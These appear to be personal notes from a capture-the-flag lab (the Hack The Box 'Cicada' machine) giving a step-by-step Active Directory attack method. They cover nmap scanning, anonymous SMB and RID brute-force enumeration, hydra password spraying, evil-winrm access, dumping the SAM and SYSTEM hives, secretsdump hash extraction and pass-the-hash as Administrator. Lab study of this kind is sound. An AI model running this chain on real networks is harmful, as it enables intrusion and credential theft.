AD methodology

Easy Box:

Here’s an enhanced AD exploitation methodology with commands for each step:

---

Methodology for AD Enumeration and Exploitation

1. Initial Reconnaissance and Scanning

• Identify Open Ports: Use nmap to scan common AD ports.

  nmap $target --top-ports=1000 -sV -v -sC -Pn > nmap.out

• Host Configuration: Update /etc/hosts with the target hostname if needed.

  echo "$target cicada.htb" | sudo tee -a /etc/hosts

2. SMB Enumeration and Credential Gathering

• Anonymous SMB Access: Use smbclient to list available shares.

  smbclient -L //$target -N

• User Enumeration with RID Brute-forcing:

  nxc smb $target -u 'anonymous' -p '' --rid-brute 3000

• SMB Information Gathering:

  enum4linux-ng -A $target

3. Password Discovery and Validation

• Testing Credentials: Use tools like hydra or crackmapexec to test passwords.

  hydra -L usernames.txt -p $password smb://$target

• Access Restricted Shares with Discovered Credentials:

  smbclient //$target/DEV -U 'username' -p 'password'

4. Initial Foothold

• Remote Access: Use evil-winrm to log in with valid credentials.

  evil-winrm -i $target -u 'username' -p 'password'

5. Privilege Escalation

• Identify Special Privileges:

  whoami /all

• Backup Privileges: Use reg to save critical files to accessible locations.

  reg save hklm\sam c:\Temp\sam
  reg save hklm\system c:\Temp\system

6. Extract and Use Password Hashes

• Download SAM and SYSTEM Files:

  download c:\Temp\sam
  download c:\Temp\system

• Dump Password Hashes:

python3 secretsdump.py -sam sam -system system LOCAL > hashes.txt

 ```

• Root Access: Use evil-winrm with Administrator hash.

evil-winrm -i $target -u 'Administrator' -H 'aad3b435b51404eeaad3b435b51404ee:hash'

 ```

This methodical approach covers enumeration, initial access, and privilege escalation for AD exploitation for an easy box. Took from Cicada machine.

Reference:

1. Medium Cicada machine Walkthrough
2. Sickboy github AD Cheat sheet

---